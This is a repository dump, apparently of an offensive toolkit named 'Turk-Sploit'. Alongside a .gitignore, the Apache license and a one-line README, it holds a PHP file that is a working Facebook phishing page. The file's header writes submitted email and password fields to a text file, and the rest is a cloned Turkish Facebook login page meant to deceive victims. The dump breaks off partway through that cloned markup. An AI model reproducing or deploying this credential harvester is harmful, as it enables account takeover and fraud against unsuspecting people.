[
  {
    "path": ".gitignore",
    "content": "# Byte-compiled / optimized / DLL files\n__pycache__/\n*.py[cod]\n*$py.class\n\n# C extensions\n*.so\n\n# Distribution / packaging\n.Python\nbuild/\ndevelop-eggs/\ndist/\ndownloads/\neggs/\n.eggs/\nlib/\nlib64/\nparts/\nsdist/\nvar/\nwheels/\npip-wheel-metadata/\nshare/python-wheels/\n*.egg-info/\n.installed.cfg\n*.egg\nMANIFEST\n\n# PyInstaller\n#  Usually these files are written by a python script from a template\n#  before PyInstaller builds the exe, so as to inject date/other infos into it.\n*.manifest\n*.spec\n\n# Installer logs\npip-log.txt\npip-delete-this-directory.txt\n\n# Unit test / coverage reports\nhtmlcov/\n.tox/\n.nox/\n.coverage\n.coverage.*\n.cache\nnosetests.xml\ncoverage.xml\n*.cover\n*.py,cover\n.hypothesis/\n.pytest_cache/\n\n# Translations\n*.mo\n*.pot\n\n# Django stuff:\n*.log\nlocal_settings.py\ndb.sqlite3\ndb.sqlite3-journal\n\n# Flask stuff:\ninstance/\n.webassets-cache\n\n# Scrapy stuff:\n.scrapy\n\n# Sphinx documentation\ndocs/_build/\n\n# PyBuilder\ntarget/\n\n# Jupyter Notebook\n.ipynb_checkpoints\n\n# IPython\nprofile_default/\nipython_config.py\n\n# pyenv\n.python-version\n\n# pipenv\n#   According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.\n#   However, in case of collaboration, if having platform-specific dependencies or dependencies\n#   having no cross-platform support, pipenv may install dependencies that don't work, or not\n#   install all needed dependencies.\n#Pipfile.lock\n\n# PEP 582; used by e.g. github.com/David-OConnor/pyflow\n__pypackages__/\n\n# Celery stuff\ncelerybeat-schedule\ncelerybeat.pid\n\n# SageMath parsed files\n*.sage.py\n\n# Environments\n.env\n.venv\nenv/\nvenv/\nENV/\nenv.bak/\nvenv.bak/\n\n# Spyder project settings\n.spyderproject\n.spyproject\n\n# Rope project settings\n.ropeproject\n\n# mkdocs documentation\n/site\n\n# mypy\n.mypy_cache/\n.dmypy.json\ndmypy.json\n\n# Pyre type checker\n.pyre/\n"
  },
  {
    "path": "LICENSE",
    "content": "                                 Apache License\n                           Version 2.0, January 2004\n                        http://www.apache.org/licenses/\n\n   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION\n\n   1. Definitions.\n\n      \"License\" shall mean the terms and conditions for use, reproduction,\n      and distribution as defined by Sections 1 through 9 of this document.\n\n      \"Licensor\" shall mean the copyright owner or entity authorized by\n      the copyright owner that is granting the License.\n\n      \"Legal Entity\" shall mean the union of the acting entity and all\n      other entities that control, are controlled by, or are under common\n      control with that entity. For the purposes of this definition,\n      \"control\" means (i) the power, direct or indirect, to cause the\n      direction or management of such entity, whether by contract or\n      otherwise, or (ii) ownership of fifty percent (50%) or more of the\n      outstanding shares, or (iii) beneficial ownership of such entity.\n\n      \"You\" (or \"Your\") shall mean an individual or Legal Entity\n      exercising permissions granted by this License.\n\n      \"Source\" form shall mean the preferred form for making modifications,\n      including but not limited to software source code, documentation\n      source, and configuration files.\n\n      \"Object\" form shall mean any form resulting from mechanical\n      transformation or translation of a Source form, including but\n      not limited to compiled object code, generated documentation,\n      and conversions to other media types.\n\n      \"Work\" shall mean the work of authorship, whether in Source or\n      Object form, made available under the License, as indicated by a\n      copyright notice that is included in or attached to the work\n      (an example is provided in the Appendix below).\n\n      \"Derivative Works\" shall mean any work, whether in Source or Object\n      form, that is based on (or derived from) the Work and for which the\n      editorial revisions, annotations, elaborations, or other modifications\n      represent, as a whole, an original work of authorship. For the purposes\n      of this License, Derivative Works shall not include works that remain\n      separable from, or merely link (or bind by name) to the interfaces of,\n      the Work and Derivative Works thereof.\n\n      \"Contribution\" shall mean any work of authorship, including\n      the original version of the Work and any modifications or additions\n      to that Work or Derivative Works thereof, that is intentionally\n      submitted to Licensor for inclusion in the Work by the copyright owner\n      or by an individual or Legal Entity authorized to submit on behalf of\n      the copyright owner. For the purposes of this definition, \"submitted\"\n      means any form of electronic, verbal, or written communication sent\n      to the Licensor or its representatives, including but not limited to\n      communication on electronic mailing lists, source code control systems,\n      and issue tracking systems that are managed by, or on behalf of, the\n      Licensor for the purpose of discussing and improving the Work, but\n      excluding communication that is conspicuously marked or otherwise\n      designated in writing by the copyright owner as \"Not a Contribution.\"\n\n      \"Contributor\" shall mean Licensor and any individual or Legal Entity\n      on behalf of whom a Contribution has been received by Licensor and\n      subsequently incorporated within the Work.\n\n   2. Grant of Copyright License. Subject to the terms and conditions of\n      this License, each Contributor hereby grants to You a perpetual,\n      worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n      copyright license to reproduce, prepare Derivative Works of,\n      publicly display, publicly perform, sublicense, and distribute the\n      Work and such Derivative Works in Source or Object form.\n\n   3. Grant of Patent License. Subject to the terms and conditions of\n      this License, each Contributor hereby grants to You a perpetual,\n      worldwide, non-exclusive, no-charge, royalty-free, irrevocable\n      (except as stated in this section) patent license to make, have made,\n      use, offer to sell, sell, import, and otherwise transfer the Work,\n      where such license applies only to those patent claims licensable\n      by such Contributor that are necessarily infringed by their\n      Contribution(s) alone or by combination of their Contribution(s)\n      with the Work to which such Contribution(s) was submitted. If You\n      institute patent litigation against any entity (including a\n      cross-claim or counterclaim in a lawsuit) alleging that the Work\n      or a Contribution incorporated within the Work constitutes direct\n      or contributory patent infringement, then any patent licenses\n      granted to You under this License for that Work shall terminate\n      as of the date such litigation is filed.\n\n   4. Redistribution. You may reproduce and distribute copies of the\n      Work or Derivative Works thereof in any medium, with or without\n      modifications, and in Source or Object form, provided that You\n      meet the following conditions:\n\n      (a) You must give any other recipients of the Work or\n          Derivative Works a copy of this License; and\n\n      (b) You must cause any modified files to carry prominent notices\n          stating that You changed the files; and\n\n      (c) You must retain, in the Source form of any Derivative Works\n          that You distribute, all copyright, patent, trademark, and\n          attribution notices from the Source form of the Work,\n          excluding those notices that do not pertain to any part of\n          the Derivative Works; and\n\n      (d) If the Work includes a \"NOTICE\" text file as part of its\n          distribution, then any Derivative Works that You distribute must\n          include a readable copy of the attribution notices contained\n          within such NOTICE file, excluding those notices that do not\n          pertain to any part of the Derivative Works, in at least one\n          of the following places: within a NOTICE text file distributed\n          as part of the Derivative Works; within the Source form or\n          documentation, if provided along with the Derivative Works; or,\n          within a display generated by the Derivative Works, if and\n          wherever such third-party notices normally appear. The contents\n          of the NOTICE file are for informational purposes only and\n          do not modify the License. You may add Your own attribution\n          notices within Derivative Works that You distribute, alongside\n          or as an addendum to the NOTICE text from the Work, provided\n          that such additional attribution notices cannot be construed\n          as modifying the License.\n\n      You may add Your own copyright statement to Your modifications and\n      may provide additional or different license terms and conditions\n      for use, reproduction, or distribution of Your modifications, or\n      for any such Derivative Works as a whole, provided Your use,\n      reproduction, and distribution of the Work otherwise complies with\n      the conditions stated in this License.\n\n   5. Submission of Contributions. Unless You explicitly state otherwise,\n      any Contribution intentionally submitted for inclusion in the Work\n      by You to the Licensor shall be under the terms and conditions of\n      this License, without any additional terms or conditions.\n      Notwithstanding the above, nothing herein shall supersede or modify\n      the terms of any separate license agreement you may have executed\n      with Licensor regarding such Contributions.\n\n   6. Trademarks. This License does not grant permission to use the trade\n      names, trademarks, service marks, or product names of the Licensor,\n      except as required for reasonable and customary use in describing the\n      origin of the Work and reproducing the content of the NOTICE file.\n\n   7. Disclaimer of Warranty. Unless required by applicable law or\n      agreed to in writing, Licensor provides the Work (and each\n      Contributor provides its Contributions) on an \"AS IS\" BASIS,\n      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n      implied, including, without limitation, any warranties or conditions\n      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A\n      PARTICULAR PURPOSE. You are solely responsible for determining the\n      appropriateness of using or redistributing the Work and assume any\n      risks associated with Your exercise of permissions under this License.\n\n   8. Limitation of Liability. In no event and under no legal theory,\n      whether in tort (including negligence), contract, or otherwise,\n      unless required by applicable law (such as deliberate and grossly\n      negligent acts) or agreed to in writing, shall any Contributor be\n      liable to You for damages, including any direct, indirect, special,\n      incidental, or consequential damages of any character arising as a\n      result of this License or out of the use or inability to use the\n      Work (including but not limited to damages for loss of goodwill,\n      work stoppage, computer failure or malfunction, or any and all\n      other commercial damages or losses), even if such Contributor\n      has been advised of the possibility of such damages.\n\n   9. Accepting Warranty or Additional Liability. While redistributing\n      the Work or Derivative Works thereof, You may choose to offer,\n      and charge a fee for, acceptance of support, warranty, indemnity,\n      or other liability obligations and/or rights consistent with this\n      License. However, in accepting such obligations, You may act only\n      on Your own behalf and on Your sole responsibility, not on behalf\n      of any other Contributor, and only if You agree to indemnify,\n      defend, and hold each Contributor harmless for any liability\n      incurred by, or claims asserted against, such Contributor by reason\n      of your accepting any such warranty or additional liability.\n\n   END OF TERMS AND CONDITIONS\n\n   APPENDIX: How to apply the Apache License to your work.\n\n      To apply the Apache License to your work, attach the following\n      boilerplate notice, with the fields enclosed by brackets \"[]\"\n      replaced with your own identifying information. (Don't include\n      the brackets!)  The text should be enclosed in the appropriate\n      comment syntax for the file format. We also recommend that a\n      file or class name and description of purpose be included on the\n      same \"printed page\" as the copyright notice for easier\n      identification within third-party archives.\n\n   Copyright [yyyy] [name of copyright owner]\n\n   Licensed under the Apache License, Version 2.0 (the \"License\");\n   you may not use this file except in compliance with the License.\n   You may obtain a copy of the License at\n\n       http://www.apache.org/licenses/LICENSE-2.0\n\n   Unless required by applicable law or agreed to in writing, software\n   distributed under the License is distributed on an \"AS IS\" BASIS,\n   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n   See the License for the specific language governing permissions and\n   limitations under the License.\n"
  },
  {
    "path": "README.md",
    "content": "# Turk-Sploit"
  },
  {
    "path": "Site/Facebook/Site-facebook/index.php",
    "content": "<?php\r\nif (!empty($_POST['emails']) && !empty($_POST['passwd'])) {\r\n\r\n\r\n$ac = fopen(\"facebook.txt\",\"a+\");\r\n$username = $_POST['emails'];\r\n$password = $_POST['passwd'];\r\n$userlar = (\"\\n__________________ \\n Username : \".$username.\"\\n Password : \".$password.\"\\n__________________ \\n\");\r\nfwrite($ac,$userlar);\r\nfclose($ac);\r\n}\r\n\r\n\r\n ?>\r\n\r\n<html lang=\"tr\" id=\"facebook\" class=\"no_js\">\r\n<head><meta charset=\"utf-8\" /><meta name=\"referrer\" content=\"origin-when-crossorigin\" id=\"meta_referrer\" /><script>window._cstart=+new Date();</script><script>function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy([\"Env\"],b):(window.Env=window.Env||{},b(window.Env))}envFlush({\"ajaxpipe_token\":\"AXjpt46ct7Pf4U2s\",\"timeslice_heartbeat_config\":{\"pollIntervalMs\":33,\"idleGapThresholdMs\":60,\"ignoredTimesliceNames\":{\"requestAnimationFrame\":true,\"Event listenHandler mousemove\":true,\"Event listenHandler mouseover\":true,\"Event listenHandler mouseout\":true,\"Event listenHandler scroll\":true},\"isHeartbeatEnabled\":true,\"isArtilleryOn\":false},\"shouldLogCounters\":true,\"timeslice_categories\":{\"react_render\":true,\"reflow\":true},\"sample_continuation_stacktraces\":true,\"dom_mutation_flag\":true,\"khsh\":\"0`sj`e`rm`s-0fdu^gshdoer-0gc^eurf-3gc^eurf;1;enbtldou;fduDmdldourCxO`ld-2YLMIuuqSdptdru;qsnunuxqd;rdoe-0unjdojnx-0unjdojnx0-0gdubi^rdbsduOdv-0`sj`e`r-0q`xm`r-0StoRbs`qhof-0mhoj^q`xm`r\",\"stack_trace_limit\":30,\"timesliceBufferSize\":5000,\"show_invariant_decoder\":false,\"compat_iframe_token\":\"AQ4EOCO9GQBHE73p\",\"isCQuick\":false});</script><style></style><script>__DEV__=0;CavalryLogger=window.CavalryLogger||function(a){this.lid=a,this.transition=!1,this.metric_collected=!1,this.is_detailed_profiler=!1,this.instrumentation_started=!1,this.pagelet_metrics={},this.events={},this.ongoing_watch={},this.values={t_cstart:window._cstart},this.piggy_values={},this.bootloader_metrics={},this.resource_to_pagelet_mapping={},this.initializeInstrumentation&&this.initializeInstrumentation()},CavalryLogger.prototype.setIsDetailedProfiler=function(a){this.is_detailed_profiler=a;return this},CavalryLogger.prototype.setTTIEvent=function(a){this.tti_event=a;return this},CavalryLogger.prototype.setValue=function(a,b,c,d){d=d?this.piggy_values:this.values;(typeof d[a]===\"undefined\"||c)&&(d[a]=b);return this},CavalryLogger.prototype.getLastTtiValue=function(){return this.lastTtiValue},CavalryLogger.prototype.setTimeStamp=CavalryLogger.prototype.setTimeStamp||function(a,b,c,d){this.mark(a);var e=this.values.t_cstart||this.values.t_start;e=d?e+d:CavalryLogger.now();this.setValue(a,e,b,c);this.tti_event&&a==this.tti_event&&(this.lastTtiValue=e,this.setTimeStamp(\"t_tti\",b));return this},CavalryLogger.prototype.mark=typeof console===\"object\"&&console.timeStamp?function(a){console.timeStamp(a)}:function(){},CavalryLogger.prototype.addPiggyback=function(a,b){this.piggy_values[a]=b;return this},CavalryLogger.instances={},CavalryLogger.id=0,CavalryLogger.disableArtilleryOnUntilOffLogging=!1,CavalryLogger.getInstance=function(a){typeof a===\"undefined\"&&(a=CavalryLogger.id);CavalryLogger.instances[a]||(CavalryLogger.instances[a]=new CavalryLogger(a));return CavalryLogger.instances[a]},CavalryLogger.setPageID=function(a){if(CavalryLogger.id===0){var b=CavalryLogger.getInstance();CavalryLogger.instances[a]=b;CavalryLogger.instances[a].lid=a;delete CavalryLogger.instances[0]}CavalryLogger.id=a},CavalryLogger.now=function(){return window.performance&&performance.timing&&performance.timing.navigationStart&&performance.now?performance.now()+performance.timing.navigationStart:new Date().getTime()},CavalryLogger.prototype.measureResources=function(){},CavalryLogger.prototype.profileEarlyResources=function(){},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){},CavalryLogger.start_js=function(){},CavalryLogger.done_js=function(){};CavalryLogger.getInstance().setTTIEvent(\"t_domcontent\");CavalryLogger.prototype.measureResources=function(a,b){if(!this.log_resources)return;var c=\"bootload/\"+a.name;if(this.bootloader_metrics[c]!==void 0||this.ongoing_watch[c]!==void 0)return;var d=CavalryLogger.now();this.ongoing_watch[c]=d;\"start_\"+c in this.bootloader_metrics||(this.bootloader_metrics[\"start_\"+c]=d);b&&!(\"tag_\"+c in this.bootloader_metrics)&&(this.bootloader_metrics[\"tag_\"+c]=b);if(a.type===\"js\"){c=\"js_exec/\"+a.name;this.ongoing_watch[c]=d}},CavalryLogger.prototype.stopWatch=function(a){if(this.ongoing_watch[a]){var b=CavalryLogger.now(),c=b-this.ongoing_watch[a];this.bootloader_metrics[a]=c;var d=this.piggy_values;a.indexOf(\"bootload\")===0&&(d.t_resource_download||(d.t_resource_download=0),d.resources_downloaded||(d.resources_downloaded=0),d.t_resource_download+=c,d.resources_downloaded+=1,d[\"tag_\"+a]==\"_EF_\"&&(d.t_pagelet_cssload_early_resources=b));delete this.ongoing_watch[a]}return this},CavalryLogger.getBootloaderMetricsFromAllLoggers=function(){var a={};Object.values(window.CavalryLogger.instances).forEach(function(b){b.bootloader_metrics&&Object.assign(a,b.bootloader_metrics)});return a},CavalryLogger.start_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch(\"js_exec/\"+a[b])},CavalryLogger.done_js=function(a){for(var b=0;b<a.length;++b)CavalryLogger.getInstance().stopWatch(\"bootload/\"+a[b])},CavalryLogger.prototype.profileEarlyResources=function(a){for(var b=0;b<a.length;b++)this.measureResources({name:a[b][0],type:a[b][1]?\"js\":\"\"},\"_EF_\")};CavalryLogger.getInstance().log_resources=true;CavalryLogger.getInstance().setIsDetailedProfiler(true);window.CavalryLogger&&CavalryLogger.getInstance().setTimeStamp(\"t_start\");</script><noscript><meta http-equiv=\"refresh\" content=\"0; URL=/login/?_fb_noscript=1\" /></noscript><link rel=\"manifest\" href=\"/data/manifest/\" crossorigin=\"use-credentials\" /><title id=\"pageTitle\">Facebook&#039;a Giriş Yap | Facebook</title><meta property=\"og:site_name\" content=\"Facebook\" /><meta property=\"og:url\" content=\"https://tr-tr.facebook.com/login/\" /><meta property=\"og:locale\" content=\"tr_TR\" /><link rel=\"search\" type=\"application/opensearchdescription+xml\" href=\"/osd.xml\" title=\"Facebook\" /><link rel=\"canonical\" href=\"https://tr-tr.facebook.com/login/\" /><link rel=\"alternate\" media=\"only screen and (max-width: 640px)\" href=\"https://m.facebook.com/login/\" /><link rel=\"alternate\" media=\"handheld\" href=\"https://m.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"x-default\" href=\"https://www.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"en\" href=\"https://www.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"ar\" href=\"https://ar-ar.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"bg\" href=\"https://bg-bg.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"bs\" href=\"https://bs-ba.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"ca\" href=\"https://ca-es.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"da\" href=\"https://da-dk.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"el\" href=\"https://el-gr.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"es\" href=\"https://es-la.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"es-es\" href=\"https://es-es.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"fa\" href=\"https://fa-ir.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"fi\" href=\"https://fi-fi.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"fr\" href=\"https://fr-fr.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"fr-ca\" href=\"https://fr-ca.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"hi\" href=\"https://hi-in.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"hr\" href=\"https://hr-hr.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"id\" href=\"https://id-id.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"it\" href=\"https://it-it.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"ko\" href=\"https://ko-kr.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"mk\" href=\"https://mk-mk.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"ms\" href=\"https://ms-my.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"pl\" href=\"https://pl-pl.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"pt\" href=\"https://pt-br.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"pt-pt\" href=\"https://pt-pt.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"ro\" href=\"https://ro-ro.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"sl\" href=\"https://sl-si.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"sr\" href=\"https://sr-rs.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"th\" href=\"https://th-th.facebook.com/login/\" /><link rel=\"alternate\" hreflang=\"vi\" href=\"https://vi-vn.facebook.com/login/\" /><meta name=\"description\" content=\"Arkada&#x15f;lar&#x131;nla, akrabalar&#x131;nla ve tan&#x131;d&#x131;klar&#x131;nla payla&#x15f;&#x131;mda bulunmaya ve ba&#x11f;lant&#x131; kurmaya ba&#x15f;lamak i&#xe7;in Facebook&#039;a giri&#x15f; yap.\" /><meta name=\"robots\" content=\"noodp,noydir\" /><link rel=\"shortcut icon\" href=\"https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico\" /><link type=\"text/css\" rel=\"stylesheet\" href=\"https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/Jd907cm-1wq.css?_nc_x=Ij3Wp8lg5Kz\" data-bootloader-hash=\"R3U4L\" crossorigin=\"anonymous\" />\r\n<link type=\"text/css\" rel=\"stylesheet\" href=\"https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0,cross/ZrGrUlA4EHf.css?_nc_x=Ij3Wp8lg5Kz\" data-bootloader-hash=\"Rxqhi\" crossorigin=\"anonymous\" />\r\n<link type=\"text/css\" rel=\"stylesheet\" href=\"https://static.xx.fbcdn.net/rsrc.php/v3/yZ/l/0,cross/1uxt1bMNsC3.css?_nc_x=Ij3Wp8lg5Kz\" data-bootloader-hash=\"ccHw5\" crossorigin=\"anonymous\" />\r\n<link type=\"text/css\" rel=\"stylesheet\" href=\"https://static.xx.fbcdn.net/rsrc.php/v3/y-/l/0,cross/K9pdzYGrCKJ.css?_nc_x=Ij3Wp8lg5Kz\" data-bootloader-hash=\"hofEO\" crossorigin=\"anonymous\" />\r\n<link type=\"text/css\" rel=\"stylesheet\" href=\"https://static.xx.fbcdn.net/rsrc.php/v3/yO/l/0,cross/Mciy1MP5XXx.css?_nc_x=Ij3Wp8lg5Kz\" data-bootloader-hash=\"IDsgc\" crossorigin=\"anonymous\" />\r\n<link type=\"text/css\" rel=\"stylesheet\" href=\"https://static.xx.fbcdn.net/rsrc.php/v3/yd/l/0,cross/HARk1l5Iu25.css?_nc_x=Ij3Wp8lg5Kz\" data-bootloader-hash=\"1s8uL\" crossorigin=\"anonymous\" />\r\n<script src=\"https://static.xx.fbcdn.net/rsrc.php/v3/yg/r/Dcyhk-kVoDJ.js?_nc_x=Ij3Wp8lg5Kz\" data-bootloader-hash=\"0WrhF\" crossorigin=\"anonymous\"></script>\r\n<script>requireLazy([\"gkx\"],function(gkx){gkx.add({\"676837\":{\"result\":false,\"hash\":\"AT5y-smrwvUKCndG\"},\"946894\":{\"result\":false,\"hash\":\"AT6X_2W0E5pxuW6l\"},\"996940\":{\"result\":false,\"hash\":\"AT6rAQQaqlHECDmN\"},\"1263340\":{\"result\":false,\"hash\":\"AT4lYnixmH4jfJTR\"},\"676920\":{\"result\":false,\"hash\":\"AT6adoZKfm1uQCrp\"},\"676921\":{\"result\":false,\"hash\":\"AT6KNKDeKEO5-1gq\"},\"676922\":{\"result\":false,\"hash\":\"AT7Z8B2hIYLMya6j\"},\"1073500\":{\"result\":true,\"hash\":\"AT7N4yF3WFvLso9u\"},\"1113247\":{\"result\":false,\"hash\":\"AT6hNT1MhFL1cTCM\"},\"708253\":{\"result\":false,\"hash\":\"AT6BNI0lJh7r7vHJ\"},\"1167394\":{\"result\":false,\"hash\":\"AT6ujSRvYxnRLOc6\"},\"1278639\":{\"result\":false,\"hash\":\"AT5PQMIAmmVK-pZP\"}});});requireLazy([\"qex\"],function(qex){qex.add({\"1211266\":{\"r\":null}});});require(\"TimeSliceImpl\").guard(function(){(require(\"ServerJSDefine\")).handleDefines([[\"URLFragmentPreludeConfig\",[],{\"hashtagRedirect\":true,\"fragBlacklist\":[\"nonce\",\"access_token\",\"oauth_token\",\"xs\",\"checkpoint_data\",\"code\"]},137],[\"BootloaderConfig\",[],{\"jsRetries\":[200,500],\"jsRetryAbortNum\":2,\"jsRetryAbortTime\":5,\"payloadEndpointURI\":\"https:\\/\\/tr-tr.facebook.com\\/ajax\\/bootloader-endpoint\\/\",\"preloadBE\":true,\"shouldCoalesceModuleRequestsMadeInSameTick\":true,\"retryQueuedBootloads\":false,\"silentDups\":false},329],[\"CSSLoaderConfig\",[],{\"timeout\":5000,\"modulePrefix\":\"BLCSS:\",\"loadEventSupported\":true},619],[\"CookieCoreConfig\",[],{\"a11y\":{\"s\":\"None\"},\"act\":{\"s\":\"Lax\"},\"c_user\":{\"s\":\"None\"},\"dpr\":{\"t\":604800,\"s\":\"None\"},\"js_ver\":{\"t\":604800,\"s\":\"None\"},\"locale\":{\"t\":604800,\"s\":\"None\"},\"m_pixel_ratio\":{\"t\":604800,\"s\":\"None\"},\"noscript\":{\"s\":\"None\"},\"pnl_data2\":{\"t\":2,\"s\":\"None\"},\"presence\":{\"s\":\"None\"},\"sfau\":{\"s\":\"None\"},\"wd\":{\"t\":604800,\"s\":\"None\"},\"x-referer\":{\"s\":\"None\"},\"x-src\":{\"t\":1,\"s\":\"None\"}},2104],[\"CurrentCommunityInitialData\",[],{},490],[\"CurrentEnvironment\",[],{\"facebookdotcom\":true,\"messengerdotcom\":false,\"workplacedotcom\":false},827],[\"CurrentUserInitialData\",[],{\"USER_ID\":\"0\",\"ACCOUNT_ID\":\"0\",\"NAME\":\"\",\"SHORT_NAME\":null,\"IS_MESSENGER_ONLY_USER\":false,\"IS_DEACTIVATED_ALLOWED_ON_MESSENGER\":false,\"APP_ID\":\"256281040558\"},270],[\"DTSGInitialData\",[],{},258],[\"ISB\",[],{},330],[\"LSD\",[],{\"token\":\"AVqWAjtz\"},323],[\"ServerNonce\",[],{\"ServerNonce\":\"vinnkYmd5yXoOSlISIAFGT\"},141],[\"SiteData\",[],{\"server_revision\":1002058882,\"client_revision\":1002058882,\"tier\":\"\",\"push_phase\":\"C3\",\"pkg_cohort\":\"PHASED:DEFAULT\",\"pr\":1,\"haste_site\":\"www\",\"be_one_ahead\":false,\"ir_on\":true,\"is_rtl\":false,\"is_comet\":false,\"hsi\":\"6821115928571401867-0\",\"spin\":4,\"__spin_r\":1002058882,\"__spin_b\":\"trunk\",\"__spin_t\":1588164812,\"vip\":\"185.60.218.19\"},317],[\"SprinkleConfig\",[],{\"param_name\":\"jazoest\",\"version\":2,\"should_randomize\":false},2111],[\"UserAgentData\",[],{\"browserArchitecture\":\"64\",\"browserFullVersion\":\"81.0.4044.122\",\"browserMinorVersion\":0,\"browserName\":\"Chrome\",\"browserVersion\":81,\"deviceName\":\"Unknown\",\"engineName\":\"WebKit\",\"engineVersion\":\"537.36\",\"platformArchitecture\":\"64\",\"platformName\":\"Windows\",\"platformVersion\":\"7\",\"platformFullVersion\":\"7\"},527],[\"PromiseUsePolyfillSetImmediateGK\",[],{\"www_always_use_polyfill_setimmediate\":false},2190],[\"KSConfig\",[],{\"killed\":{\"__set\":[\"POCKET_MONSTERS_CREATE\",\"POCKET_MONSTERS_DELETE\",\"VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG\",\"STO_AD_DELIVERY_PAUSE\",\"POCKET_MONSTERS_UPDATE_NAME\",\"ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION\",\"MOBILITY_KILL_OLD_VISIBILITY_POSITION_SETTING\",\"WORKPLACE_DISPLAY_TEXT_EVIDENCE_REPORTING\",\"DYNAMIC_ADS_SET_CATALOG_AND_PRODUCT_SET_TOGETHER\",\"BUSINESS_GRAPH_SETTING_APP_ASSIGNED_USERS_NEW_API\",\"BUSINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API\",\"BUSINESS_GRAPH_SETTING_ESG_ASSIGNED_USERS_NEW_API\",\"BUSINESS_GRAPH_SETTING_PRODUCT_CATALOG_ASSIGNED_USERS_NEW_API\",\"BUSINESS_MANAGER_SHOW_UI_HIDDEN_TASK_FOR_ASSET\",\"BUSINESS_GRAPH_SETTING_BU_ASSIGNED_USERS_NEW_API\",\"BUSINESS_GRAPH_SETTING_SESG_ASSIGNED_USERS_NEW_API\",\"RECRUITING_REQUISITION_VALIDATE_COMPANY_GROUPING_ON_LINK\",\"CALENDAR_WEEKVIEW_NEW_BADGE\",\"POST_INSIGHTS_CAPITALIZE_BREAKDOWNS_FOR_ACTION_TYPE\",\"WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES\",\"BUY_AT_COVID_PUNCHOUT_CHECKOUT_MODAL\",\"DISABLE_HEARTBEAT_POLLING\",\"LAB_NET_NEW_UI_RELEASE\",\"WIT_DEPRECATE_GITHUB\",\"WIT_DEPRECATE_OLD_UX\",\"EO_SRT_HELPDESK_DASHBOARD_DISABLE_UNUSED_TAB_IN_RIGHT_PANEL\"]},\"ko\":{\"__set\":[\"acrJTh9WGdp\",\"1oOE64fL4wO\",\"2dhqRnqXGLQ\",\"3GaiM9xYkM2\",\"7r6mSP7ofr2\",\"1ntjZ2zgf03\",\"3oh5Mw86USj\",\"8NAceEy9JZo\",\"5mNEXob0nTj\",\"4j36SVzvP3w\",\"8PlKuowafe8\",\"53gCxKq281G\",\"3yzzwBY7Npj\",\"4NbCsulUUI3\",\"4NSq3ZC4ScE\",\"1onzIv0jH6H\",\"5LSlJUj3BnT\",\"7EZACZMulOj\",\"6ra3sC1PDFj\",\"5XCz1h9Iaw3\",\"7cwY7xv5s7H\",\"1GgWO1oFyLN\",\"DDZhogI19W\",\"9k7Y5kmDD1A\",\"4jkC8ia3PYA\",\"6fHw06UmAMW\"]}},2580],[\"DataStoreConfig\",[],{\"expandoKey\":\"__FB_STORE\",\"useExpando\":true},2915],[\"CookieCoreLoggingConfig\",[],{\"maximumIgnorableStallMs\":16.67,\"sampleRate\":9.7e-5,\"sampleRateClassic\":1.0e-10,\"sampleRateFastStale\":1.0e-8},3401],[\"ImmediateImplementationExperiments\",[],{\"prefer_message_channel\":true},3419],[\"DTSGInitData\",[],{\"token\":\"\",\"async_get_token\":\"\"},3515],[\"UriNeedRawQuerySVConfig\",[],{\"uris\":[\"dms.netmng.com\",\"doubleclick.net\",\"r.msn.com\",\"watchit.sky.com\",\"graphite.instagram.com\",\"www.kfc.co.th\",\"learn.pantheon.io\",\"www.landmarkshops.in\",\"www.ncl.com\",\"s0.wp.com\",\"www.tatacliq.com\",\"bs.serving-sys.com\",\"kohls.com\",\"lazada.co.th\",\"xg4ken.com\",\"technopark.ru\",\"officedepot.com.mx\",\"bestbuy.com.mx\",\"booking.com\"]},3871],[\"InitialCookieConsent\",[],{\"deferCookies\":false,\"noCookies\":false,\"shouldShowCookieBanner\":false},4328],[\"TrustedTypesConfig\",[],{\"useTrustedTypes\":false,\"reportOnly\":true},4548],[\"WebConnectionClassServerGuess\",[],{\"connectionClass\":\"GOOD\"},4705],[\"CometAltpayJsSdkIframeAllowedDomains\",[],{\"